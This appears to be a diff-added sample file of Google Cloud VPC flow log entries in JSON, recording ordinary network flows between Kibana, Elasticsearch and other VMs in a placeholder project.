+{"insertId":"ut8lbrffooxyq","jsonPayload":{"bytes_sent":"66029","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33692},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565287007Z","packets_sent":"361","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500498059Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} 
+{"insertId":"ut8lbrffooxz2","jsonPayload":{"bytes_sent":"65154","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33542},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565272745Z","packets_sent":"360","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.150720950Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} 
+{"insertId":"ut8lbrffooxyo","jsonPayload":{"bytes_sent":"13643","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33970},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821302149Z","packets_sent":"99","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.466657665Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} 
+{"insertId":"ut8lbrffooxzc","jsonPayload":{"bytes_sent":"34509840","connection":{"dest_ip":"10.49.136.133","dest_port":46864,"protocol":6,"src_ip":"67.43.156.13","src_port":9243},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"simianhacker-demo","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:29.432367659Z","packets_sent":"8690","reporter":"DEST","rtt_msec":"36","start_time":"2019-06-14T03:40:17.343890802Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"}
+{"insertId":"ut8lbrffooxz7","jsonPayload":{"bytes_sent":"1467","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.13","src_port":34836},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:48:39.076420731Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:48:38.961050187Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"}
+{"insertId":"ut8lbrffooxyu","jsonPayload":{"bytes_sent":"63671","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33554},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565311154Z","packets_sent":"367","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500506974Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} 
+{"insertId":"ut8lbrffooxyv","jsonPayload":{"bytes_sent":"51075","connection":{"dest_ip":"67.43.156.13","dest_port":65320,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.220714119Z","packets_sent":"608","reporter":"SRC","rtt_msec":"220","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.560917237Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} +{"insertId":"ut8lbrffooxz0","jsonPayload":{"bytes_sent":"197840","connection":{"dest_ip":"67.43.156.13","dest_port":33562,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.393910944Z","packets_sent":"258","reporter":"SRC","rtt_msec":"192","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:01.074897435Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-proj
ect","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} +{"insertId":"ut8lbrffooxys","jsonPayload":{"bytes_sent":"173805495","connection":{"dest_ip":"67.43.156.13","dest_port":9243,"protocol":6,"src_ip":"10.49.136.133","src_port":46864},"end_time":"2019-06-14T03:49:58.716492806Z","packets_sent":"44438","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"simianhacker-demo","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:17.306085222Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} +{"insertId":"ut8lbrffooxyx","jsonPayload":{"bytes_sent":"1468","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.13","src_port":33478},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:45:37.301953198Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:45:37.186193305Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} 
+{"insertId":"ut8lbrffooxz4","jsonPayload":{"bytes_sent":"159704","connection":{"dest_ip":"67.43.156.13","dest_port":33548,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.393651211Z","packets_sent":"241","reporter":"SRC","rtt_msec":"50","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:05.147252064Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} 
+{"insertId":"ut8lbrffooxz3","jsonPayload":{"bytes_sent":"70775","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":65320},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.220714119Z","packets_sent":"732","reporter":"DEST","rtt_msec":"220","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:40:00.560917237Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} +{"insertId":"ut8lbrffooxz9","jsonPayload":{"bytes_sent":"281147","connection":{"dest_ip":"10.87.40.76","dest_port":33542,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565272745Z","packets_sent":"246","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.150720950Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-projec
t","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} +{"insertId":"ut8lbrffooxyr","jsonPayload":{"bytes_sent":"63590","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33548},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:48.537763242Z","packets_sent":"340","reporter":"DEST","rtt_msec":"50","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:05.147252064Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} 
+{"insertId":"ut8lbrffooxyy","jsonPayload":{"bytes_sent":"1780","connection":{"dest_ip":"67.43.156.13","dest_port":34836,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:48:39.076420731Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:48:38.961050187Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} +{"insertId":"1ulp77rfdvho4g","jsonPayload":{"bytes_sent":"1239","connection":{"dest_ip":"10.139.99.242","dest_port":22,"protocol":6,"src_ip":"192.168.2.165","src_port":59623},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:40:52.361155668Z","packets_sent":"18","reporter":"DEST","rtt_msec":"233","src_location":{"asn":45899,"city":"Vĩnh Yên","continent":"Asia","country":"vnm","region":"Vinh Phuc Province"},"start_time":"2019-06-14T03:40:46.541094678Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} 
+{"insertId":"1ulp77rfdvho5r","jsonPayload":{"bytes_sent":"63853","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33552},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:55.213244028Z","packets_sent":"363","reporter":"SRC","rtt_msec":"2","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.075811571Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} 
+{"insertId":"1ulp77rfdvho5k","jsonPayload":{"bytes_sent":"1458","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.14","src_port":33924},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:46:20.745658276Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:46:20.634435179Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} +{"insertId":"1ulp77rfdvho55","jsonPayload":{"bytes_sent":"252397","connection":{"dest_ip":"67.43.156.13","dest_port":33534,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.597088427Z","packets_sent":"260","reporter":"SRC","rtt_msec":"311","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.075942176Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnet
work_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} +{"insertId":"1ulp77rfdvho60","jsonPayload":{"bytes_sent":"205787","connection":{"dest_ip":"67.43.156.13","dest_port":33694,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565117754Z","packets_sent":"265","reporter":"SRC","rtt_msec":"216","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:05.566551903Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} 
+{"insertId":"1ulp77rfdvho49","jsonPayload":{"bytes_sent":"106409","connection":{"dest_ip":"67.43.156.13","dest_port":65263,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.220748025Z","packets_sent":"607","reporter":"SRC","rtt_msec":"87","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:01.270990648Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} +{"insertId":"1ulp77rfdvho4t","jsonPayload":{"bytes_sent":"61242","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33534},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.597088427Z","packets_sent":"356","reporter":"DEST","rtt_msec":"311","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.075942176Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-pro
ject","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} +{"insertId":"1ulp77rfdvho68","jsonPayload":{"bytes_sent":"248826","connection":{"dest_ip":"67.43.156.13","dest_port":49680,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"siem-windows","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"windows-isolated","vpc_name":"windows-isolated"},"end_time":"2019-06-14T03:49:55.705469925Z","packets_sent":"735","reporter":"SRC","rtt_msec":"113","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.711043814Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} 
+{"insertId":"1ulp77rfdvho5n","jsonPayload":{"bytes_sent":"1777","connection":{"dest_ip":"192.168.2.117","dest_port":33862,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:46:11.779780615Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:46:11.655143526Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} +{"insertId":"1ulp77rfdvho5l","jsonPayload":{"bytes_sent":"116845","connection":{"dest_ip":"67.43.156.13","dest_port":65321,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.312105537Z","packets_sent":"594","reporter":"SRC","rtt_msec":"219","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.843986502Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} 
+{"insertId":"1ulp77rfdvho65","jsonPayload":{"bytes_sent":"4614","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33524},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.461087350Z","packets_sent":"58","reporter":"DEST","rtt_msec":"0","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:24.790136141Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} 
+{"insertId":"1ulp77rfdvho4b","jsonPayload":{"bytes_sent":"50379","connection":{"dest_ip":"192.168.2.177","dest_port":60112,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"suricata-iowa","zone":"us-central1-a"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:18.224268993Z","packets_sent":"130","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:14.031541248Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} 
+{"insertId":"1ulp77rfdvho4m","jsonPayload":{"bytes_sent":"200417","connection":{"dest_ip":"10.87.40.76","dest_port":33552,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:55.213244028Z","packets_sent":"250","reporter":"DEST","rtt_msec":"2","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.075811571Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} 
